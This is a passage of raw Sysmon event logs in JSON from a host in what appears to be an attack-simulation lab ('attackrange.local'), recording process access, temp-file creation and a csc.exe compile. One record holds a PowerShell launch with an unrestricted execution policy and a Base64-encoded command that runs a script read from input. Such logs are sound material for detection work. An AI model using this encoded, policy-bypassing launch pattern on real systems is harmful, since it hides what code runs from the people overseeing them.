05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4556,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4557,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4558,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.733\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001023D00600}\r\nTargetProcessId: 1064\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.733","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001074B50600}","SourceProcessId":"1256","SourceThreadId":"2756","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-001023D00600}","TargetProcessId":"1064","TargetImage":"C:\\Windows\\system32\\chcp.com","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4559,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:19.186\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nProcessId: 4920\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\seif41fl.dll\r\nCreationUtcTime: 2020-08-01 05:52:19.186","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:19.186","ProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\seif41fl.dll","CreationUtcTime":"2020-08-01 05:52:19.186","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4560,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nProcessId: 4920\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\seif41fl.cmdline\r\nCreationUtcTime: 2020-08-01 05:52:19.186","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","ProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\seif41fl.cmdline","CreationUtcTime":"2020-08-01 05:52:19.186","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4561,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.193\r\nProcessGuid: {A837DB8D-0313-5F25-0000-0010A0D50600}\r\nProcessId: 2852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nFileVersion: 4.7.2053.0 built by: NET47REL1\r\nDescription: Visual C# Command Line Compiler\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: csc.exe\r\nCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\seif41fl.cmdline\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52\r\nParentProcessGuid: {A837DB8D-0312-5F25-0000-001064C40600}\r\nParentProcessId: 4920\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.193","ProcessGuid":"{A837DB8D-0313-5F25-0000-0010A0D50600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","FileVersion":"4.7.2053.0 built by: NET47REL1","Description":"Visual C# Command Line Compiler","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"csc.exe","CommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\seif41fl.cmdline\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52","ParentProcessGuid":"{A837DB8D-0312-5F25-0000-001064C40600}","ParentProcessId":"4920","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4562,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nSourceProcessId: 4920\r\nSourceThreadId: 4332\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-001064C40600}","SourceProcessId":"4920","SourceThreadId":"4332","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C6E0600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4563,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-030E-5F25-0000-00102C6E0600}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:19.186","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-030E-5F25-0000-00102C6E0600}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4564,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:19.186\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 